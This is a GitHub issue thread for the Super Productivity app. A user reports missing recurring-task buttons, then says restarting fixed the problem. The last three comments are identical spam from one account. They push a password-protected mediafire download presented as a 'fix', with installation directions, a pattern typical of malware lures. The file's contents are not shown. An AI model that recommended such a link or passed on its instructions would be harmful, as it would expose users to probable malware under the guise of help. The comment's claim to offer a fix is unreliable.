### ISSUE TITLE
Missing recurring tasks in version 9.0.7 on windows10 and version 23 from  playstore on android

### ISSUE THREAD

**Issue by domonnss** [johannesjo/super-productivity#3376]
### Your Environment

- Version used: 
- Operating System and version:`win10 version 9.0.7` and `android version 23`
- Desktop Environment: 
- Browser Name and version: 

### Expected Behavior

![image](https://github.com/user-attachments/assets/2e79834c-fd28-460f-ad82-452f873b7f73)
I tried [10.0.0-rc.0](https://github.com/johannesjo/super-productivity/releases/tag/v10.0.0-rc.0).This version has repeat button
### Current Behavior
![Screenshot_20240830_221013_Super Productivity](https://github.com/user-attachments/assets/0ccd963e-b58b-49f5-b783-a5fbed365ac5)

### Steps to Reproduce (for bugs)

1.
2.
3.
4.

**Comment by domonnss** [comment]
I just found out that after restarting, there is a repeat button.
so sry😅

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
